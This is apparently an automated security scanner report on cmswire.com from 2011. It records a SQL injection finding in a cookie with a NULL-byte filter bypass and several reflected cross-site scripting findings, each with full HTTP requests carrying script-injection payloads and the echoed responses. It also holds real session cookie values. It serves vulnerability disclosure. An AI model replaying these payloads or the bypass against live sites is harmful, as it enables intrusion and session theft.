GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; __utma_a2a=8244481635.1331853788.1300296862.1300297638.1300297654.5; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.13.9.1300297655036; _chartbeat2=apb3rd0a0c5d4seu; PHPSESSID=357e34b1c72c1afb44691f96606e9ab0''

Response 2

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:52:32 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=df57800b8dbc0ab6bf8d6c34d7ac0b49; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 75089


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

1.7. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; __utma_a2a=8244481635.1331853788.1300296862.1300297638.1300297654.5; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501%00'; __utmb=97231501.13.9.1300297655036; _chartbeat2=apb3rd0a0c5d4seu; PHPSESSID=357e34b1c72c1afb44691f96606e9ab0

Response 1 (redirected)

HTTP/1.1 404 Not found
Date: Wed, 16 Mar 2011 18:52:15 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 2262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CMSWire Error Page</title>
...[SNIP]...

Request 2

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; __utma_a2a=8244481635.1331853788.1300296862.1300297638.1300297654.5; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501%00''; __utmb=97231501.13.9.1300297655036; _chartbeat2=apb3rd0a0c5d4seu; PHPSESSID=357e34b1c72c1afb44691f96606e9ab0

Response 2

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:52:15 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 75089


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 8 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81d20"-alert(1)-"4959465b364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert(1)-"4959465b364 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:36:39 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=25bb5b81fec0a1e1787dbfef4542d454; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<script type="text/javascript">                    
       GA_googleAddAttr("page_url", "_cms_web-publishing_wordpress-31-more-of-a-cms-than-ever-before-010310_php_81d20"-alert(1)-"4959465b364");
   </script>
...[SNIP]...

2.2. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 699a3"><a>2bf0fcaee1c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364699a3"><a>2bf0fcaee1c HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; _chartbeat2=apb3rd0a0c5d4seu; __utma_a2a=8244481635.1331853788.1300296862.1300297654.1300297671.6; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.15.9.1300297671941; PHPSESSID=357e34b1c72c1afb44691f96606e9ab0

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:52:42 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 75194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<link rel="canonical" href="http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22xss%22)-%224959465b364699a3"><a>2bf0fcaee1c" />
...[SNIP]...

2.3. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5cfc"-alert(1)-"bc321ffad46 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364d5cfc"-alert(1)-"bc321ffad46 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; __utma_a2a=8244481635.1331853788.1300296862.1300297638.1300297654.5; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.13.9.1300297655036; _chartbeat2=apb3rd0a0c5d4seu; PHPSESSID=357e34b1c72c1afb44691f96606e9ab0

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:53:14 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 75229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<script type="text/javascript">                    
       GA_googleAddAttr("page_url", "_cms_web-publishing_wordpress-31-more-of-a-cms-than-ever-before-010310_php_81d20%22-alert(%22xss%22)-%224959465b364d5cfc"-alert(1)-"bc321ffad46");
   </script>
...[SNIP]...

2.4. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2b9"><script>alert(1)</script>fa0a7bc9344 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364?be2b9"><script>alert(1)</script>fa0a7bc9344=1 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; _chartbeat2=apb3rd0a0c5d4seu; __utma_a2a=8244481635.1331853788.1300296862.1300297654.1300297671.6; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.15.9.1300297671941; PHPSESSID=357e34b1c72c1afb44691f96606e9ab0

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:52:18 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 75227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
lSub_Ftrd').value)) {
       document.frmESub_Featured.action='/utils/user/signup.php?src=/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364?be2b9"><script>alert(1)</script>fa0a7bc9344=1';return true;
       } else {document.frmESub_Featured.action='http://www.aweber.com/scripts/addlead.pl'; if(pageTracker){pageTracker._trackPageview('/event/email-sub/featured-bar'); return true;}}">
...[SNIP]...

2.5. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(1)-%224959465b364 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(1)-%224959465b364

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df5df"><script>alert(1)</script>6c7aa2b1a8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(1)-%224959465b364?df5df"><script>alert(1)</script>6c7aa2b1a8f=1 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(1)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; __utma_a2a=8244481635.1331853788.1300296862.1300297622.1300297638.4; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.11.9.1300297639377; _chartbeat2=apb3rd0a0c5d4seu; PHPSESSID=25bb5b81fec0a1e1787dbfef4542d454

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:52:16 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 75187


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
$('txtEmlSub_Ftrd').value)) {
       document.frmESub_Featured.action='/utils/user/signup.php?src=/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(1)-%224959465b364?df5df"><script>alert(1)</script>6c7aa2b1a8f=1';return true;
       } else {document.frmESub_Featured.action='http://www.aweber.com/scripts/addlead.pl'; if(pageTracker){pageTracker._trackPageview('/event/email-sub/featured-bar'); return true;}}">
...[SNIP]...

2.6. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a076"><a>8be2bdab7ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364?7a076"><a>8be2bdab7ee=1 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; __utma_a2a=8244481635.1331853788.1300296862.1300297286.1300297622.3; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.9.9.1300297623392; _chartbeat2=apb3rd0a0c5d4seu; PHPSESSID=8c71c449e1fe16bcb109725e089be352

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:52:09 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
trd').value)) {
       document.frmESub_Featured.action='/utils/user/signup.php?src=/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364?7a076"><a>8be2bdab7ee=1';return true;
       } else {document.frmESub_Featured.action='http://www.aweber.com/scripts/addlead.pl'; if(pageTracker){pageTracker._trackPageview('/event/email-sub/featured-bar'); return true;}}">
...[SNIP]...

2.7. http://www.cmswire.com/taf.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /taf.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45584"-alert(1)-"da1f862d9b6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /taf.php HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitCount=1; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; PHPSESSID=80f04db3f305da3334eedebb2141974a; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmc=97231501; __utmb=97231501.3.8.1300296863274;
Referer: http://www.google.com/search?hl=en&q=45584"-alert(1)-"da1f862d9b6

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:57:18 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6655
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Tell a Friend - CMS
...[SNIP]...
tent=&utm_campaign=Internal_TAF');
                   }
   
                   // wait until page is loaded to call API
                   BitlyClient.addPageLoadEvent(function(){
